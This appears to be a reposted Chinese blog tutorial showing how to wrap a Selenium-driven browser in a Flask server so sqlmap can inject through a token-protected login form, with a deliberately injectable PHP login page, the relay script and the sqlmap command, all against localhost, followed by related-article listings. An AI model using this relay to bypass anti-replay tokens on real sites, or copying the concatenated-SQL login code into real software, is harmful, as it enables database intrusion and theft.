selenium 表单提交结果_使用 flask + selenium 中转 SQLmap 进行注入

最新推荐文章于 2023-11-26 19:40:14 发布
最新推荐文章于 2023-11-26 19:40:14 发布
阅读量210 收藏 1
点赞数
文章标签: selenium 表单提交结果 sqlmap自动扫描注入点

本文作者:Z1NG(信安之路 2019 年度荣誉作者)

逛 tools 看到大佬使用这种方式日站,感觉蛮有意思的,就本地来实现玩玩。开头放上原文链接,以表崇拜之情:

https://www.t00ls.net/articles-52164.html

使用场景

在某些登录框,由于做了 token 保护,当传入的 token 与服务端的不一样的时候就会停止程序进一步的运行。那么如果这个这个登录框存在 SQL 注入,却无法自动化攻击,使用手工脱裤难免有些尴尬。又或者前端使用了某种加密方式,而我们传入的 payload 需要先进行这样的加密。这里介绍的 flask + selenium 中转 SQLmap 的方式注入,可以解决上述的问题。

原理

通常一个 token 值都是被隐藏在一个表单之中随着表单一起被发送到服务端,这样使用 selenium 模拟登陆的方式,自然而然可以或得到最新的 token 值,从而绕过保护。那我们如何把 sqlmap 的 payload 传递给 selenium?显然,我们可以搭建一个 web 服务,接收 sqlmap 传递过来的 payload,然后通过 selenium 的将 payload 填入到目标站点之中。

5a029bdc960fc4b3357f4b8cf7daec40.png

实现利用

首先,先编写一个具有注入的登录框,测试代码如下。以下代码主要是设置了一个 token 值,防止表单重复提交。

f4b2431bbe83441adc3457aa6e8c8c51.png

<?php session_start(); function randStr( $length = 32 ) {    $str = substr(md5(time()), 0, $length);//md5加密,time()当前时间戳    return $str;}if(!isset($_SESSION['token']) || $_SESSION['token']=='') {     $_SESSION['token']=randStr();} if(isset($_POST['token'])&&$_POST['token']!==$_SESSION['token']){   $_SESSION['token']=randStr();  die("token error");}$con = mysqli_connect("localhost","root","root","user");if(!$con){ die("something erorr"); }if(isset($_POST['username'])&&isset($_POST['password'])){  $sql="select * from user where username='".$_POST['username']."' and password='".$_POST['password']."'";  echo $sql,"
";  $rs = @mysqli_query($con,$sql);  $r = @mysqli_fetch_array($rs);}$_SESSION['token']=randStr();?>"Content-Type" content=
"margin:0 auto;width:100px"> "index.php" method="POST"> 用户名:"text" name="username" id='username'/> 密 码:"password" name="password" id='password'/> "hidden" name="token" id="token" value=<?php echo $_SESSION['token'];?> /> "submit" id="submit"/>

如下两个数据包可以看出,重放数据包由于传入的 token 值和服务端的 token 值不符就会被中断。说明我们的 token 值起到了保护的作用了。

5327cc60498708a040e2cc0ffc95c80f.png

104abc9fb73e5a370cae90de717358f3.png

那么接下来,就是构造 flask+selenium 环境,用来中转 payload,从而绕过这个保护机制。首先要起一个 web 服务承接 sqlmap 发送来的 payload,然后将 payload 通过 selenium 模拟登陆的方式填入表单。

代码如下:

from flask import Flaskfrom flask import requestfrom selenium import webdriverchrome = webdriver.Chrome()chrome.get("http://127.0.0.1")app = Flask(__name__)def send(payload):    #起到中转payload效果。  chrome.find_element_by_id("username").send_keys(payload) #把payload填到有注入点的地方  chrome.find_element_by_id("password").send_keys("aaaa")  chrome.find_element_by_id("submit").click()  return "111" #随便返回一下不重要  @app.route('/')def index():    # 接收sqlmap传递过来的payload    payload = request.args.get("payload")    return send(payload)if __name__ == "__main__":    app.run()

然后把 python 脚本跑起来,接着使用 sqlmap 扫描我们自己搭建的 flask 服务,效果就如下所示。

python sqlmap.py -u"127.0.0.1:5000/?payload=1

3ea95f4e665070c58f041b51ba89f261.png

就这样,虽然 sqlmap 扫描的是 5000 端口的 flask 服务,但是 payload 就成功的被中转到了目标网站上,也能成功的识别出是否存在注入。

fcd568baa67161f5a3bc70e8ac27ea80.png

最后

其实这里有个疑问,经过了中转 sqlmap 为什么还能识别出注入

我猜测,上面的测试用例是基于时间的注入,也就是原本判断目标站点的执行时间,被转换成判断 send 函数的执行时间。而 send 函数的执行时间取决于目标网站的执行时间,因此还是等效的。那么有没有办法识别出布尔型注入呢?这个。。。没做尝试。。如果对 selenium 返回结果进行处理的得当的话,应该是可以识别的。代码写的太垃圾。。。所以就没深究了。。。

e2bab38111875dbaa8629465d6556f0a.png

weixin_39915668
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过seleniumflask中转后利用sqlmap进行注入ReberBlog1
08-03
通过 seleniumflask 中转后利用 sqlmap 进行注入0x00 先说前提昨天某个小伙伴说有个注入没法搞前端提交登陆表单时数据包加密了, 而且
flask+seleium做网站镜像
weixin_35753291的博客
02-13 142
您可以使用 SeleniumFlask 来实现网站镜像的功能。Selenium 可以自动模拟浏览器并加载网页,而 Flask 则可以提供后台服务来存储并展示镜像的内容。您可以在 Flask 中编写一些代码来定期调用 Selenium,加载指定的网页并存储镜像。然后,您可以在 Flask 中实现一个接口来展示这些镜像。这样,您就可以在网站上实现网站镜像的功能了。 ...
使用Selenium WebDriver测试Flask应用程序-第1部分
culiu9261的博客
07-20 496
Ever wondered how to write tests for the front-end of your web application? You may already have functional back-end tests, for example to ensure that your models and views are working. However, you m...
jemeter python接口自动化测试平台_基于 Jmeter 的 web 端接口自动化测试平台
weixin_39812065的博客
11-21 391
之前使用 Python + flask 开发的 selenium 自动化测试用例管理、执行平台,终于克服懒癌把业务相关的信息剥离掉,代码放到了GitHub 上面:执行效果:执行单条用例:执行用例集:autotest_platform(懒得想名字,先这么叫着)基于python+selenium自动化测试管理、执行平台。版本要求:python 3.4 以上selenium : 建议使用 3.0 以上...
结合Selenium 和 Requests完成动态数据爬取
JunhuanPeng的博客
05-21 7769
Selenium 简介 Selenium=是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中,就像真正的用户在操作一样。支持的浏览器包括IE(7, 8, 9, 10, 11),Mozilla Firefox,Safari,Google Chrome,Opera等。这个工具的主要功能包括:测试与浏览器的兼容性——测试你的应用程序看是否能够很好得工作在不同浏览器和操作系统之上...
python中selenium库的学习与扩展
weixin_47017310的博客
02-10 2726
python中selenium库的学习与扩展
autotest_platform:Python + flask + selenium搭建UI自动化测试平台
02-05
参考链接: + flask +Selenium自动化测试用例管理,执行平台自动化测试用例整理分解-百度首页 :使用python多进程模块multiprocessing并发执行测试用例autotest_platform注:2019-03-25:添加接口测试模块,具体请...
PyCharm_Test_Python+selenium_PyCharm_Seleniumweb测试_自动化测试_pythonS
08-09
PYthon+selenium web端自动化脚本,是一款极其好用的脚本,只需输入网址,录制需要测试的功能即可,后期自己添加线程
使用_Selenium_和_TestNG_进行编程式测试1
08-08
TestNG 尤其适合与 Selenium 结合使用,因为它使您能够完成其他框架无法做到的测试,例如使用依赖项进行测试,重新运行失败了的测试,以及使用单独文件中
selenium-server-standalone - 副本.zip_selenium_selenium server_sel
09-24
selenium 这是一款基于selenium平台的测试用框架,selenium server为webdriver主框架,可以用来做自动化测试
python爬虫实现POST request payload形式的请求
12-20
1. 背景 最近在爬取某个站时,发现在POST数据时,使用的数据格式是request payload,有别于之前常见的 POST数据格式(Form data)。而使用Form data数据的提交方式时,无法提交成功。 1.1. Http请求中Form Data 和 Request Payload的区别 AJAX Post请求中常用的两种传参数的形式:form data 和 request payload 1.1.1. Form data get请求的时候,我们的参数直接反映在url里面,形式为key1=value1&key2=value2形式,比如: http://news.baidu.
毕业设计:Python招聘数据分析可视化系统+爬虫+Flask框架(源码+文档)
最新发布
q_3375686806的博客
11-26 369
毕业设计:Python招聘数据分析可视化系统+爬虫+Flask框架(源码+文档)
python模拟登陆 验证码el_Python + Selenium(二十三)使用百度文字识别API识别验证码...
weixin_39780260的博客
12-08 93
上一节我们讲到验证码,通过图像识别的方式可以识别简单的验证码,所以识别对我们的意义不是特别大。不过我单独开这一节来讲,也算是扩充一些知识面,同时也可以练习一下关于 requests 的一些用法。对接口测试的理解也有很大的好处。首先我们需要注册百度开发者平台,并且认证。看这里注册好以后,创建应用并勾选文字识别服务(其实都可以勾起来玩一玩),文字识别服务分了几种,有完全免费的“通用文字识别”,每天有 ...
selenium模拟浏览器批量下载网页渲染数据并重命名
xjw的博客
06-28 2126
我需要干啥: 在该页面中提交序列(http://bioinf.cs.ucl.ac.uk/psipred/) 例如序列:MNYKELEKMLDVIFENSEIKEIDLFFDPEVEISKQEFEDLVKNADPLQKVVGDNYITETFEWWEFENQYLEFELDYYVKDEKIFVLEMHFWRKIR 提交之后,网站会跳转到这个界面(http://bioinf.cs.ucl.ac.uk/psipred/&uuid=68a83dbc-b8dc-11ea-b7bb-00163e100d53),.
python selenium 如何使用post
bigcarp的专栏
12-08 3066
selenium post
selenium定时爬取邮箱中的附件(以163邮箱为例)
木子雨巷的博客
03-05 471
【代码】selenium定时爬取邮箱中的附件(以163邮箱为例)
(python3爬虫一)linux宝塔搭建python3.x+flask+selenium
zdlcome的博客
10-13 1189
一 .1宝塔安装python项目管理器2.安装python3.x版本(宝塔系统默认环境2.7,不可共用,会影响面板等冲突)3.下载flask项目 或本地开发好的flaskflask的github地址4.上传到服务器上,项目文件夹下,一般是/www/wwwroot/python/xxx 做为根目录 (xxx为flask根文件夹)*参考路径5.添加python项目(通过python管理器创建独立运行环境)这里依赖容易报错,可以尝试下,添加失败的话,可以先去掉勾选,
python selenium爬虫豆瓣_使用selenium+requests爬取豆瓣小组讨论列表
06-07
以下是一个简单的例子,使用selenium打开豆瓣小组讨论列表页面并获取数据: ```python import time import requests from selenium import webdriver # 设置浏览器驱动路径 driver_path = '/path/to/chromedriver'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值